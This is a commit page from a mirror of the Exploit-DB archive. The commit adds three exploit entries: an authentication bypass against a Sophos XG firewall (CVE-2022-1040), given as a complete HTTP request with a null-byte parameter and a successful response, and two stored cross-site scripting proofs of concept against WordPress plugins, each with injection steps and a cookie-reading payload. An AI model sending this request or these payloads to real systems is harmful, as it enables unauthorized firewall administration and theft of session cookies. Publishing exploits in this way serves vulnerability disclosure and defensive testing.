bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-09-02

Browse source 
3 changes to exploits/shellcodes

Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2022-09-02 05:01:57 +00:00
parent a8cb58b3e5
commit 2f709ff851
4 changed files with 85 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

50
exploits/hardware/webapps/51006.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
# Date: 2022-08-04
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sophos.com
# Version: 17.0.10 MR-10
# Tested on: Windows 11
# CVE : CVE-2022-1040
# [ VULNERABILITY DETAILS ] :
#This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.
# [ SAMPLE REQUEST ] :
POST /webconsole/Controller HTTP/1.1
Host: 127.0.0.1:4444
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://127.0.0.1:4444
Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066
# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...
# [ Successful response ] :
HTTP/1.1 200 OK
Date: Thu, 04 Aug 2022 17:06:39 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 53
Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly
Connection: close
{"redirectionURL":"/webpages/index.jsp","status":200}

15
exploits/php/webapps/51007.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
# Date: 05/08/2022
# Exploit Author: saitamang , yunaranyancat , syad
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/
# Version: 2.2.6
# Tested on: Centos 7 apache2 + MySQL
WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.
Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
payload --> test"/><img/src=""/onerror=alert(document.cookie)>
The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.

17
exploits/php/webapps/51008.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 08/08/2022
# Exploit Author: saitamang, syad, yunaranyancat
# Vendor Homepage: wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL
WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.
Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif
The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.

3
files_exploits.csv
View file

@ -45067,3 +45067,6 @@ id,file,description,date,author,type,platform,port
51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
51006,exploits/hardware/webapps/51006.txt,"Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,hardware,
51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,

Can't render this file because it is too large.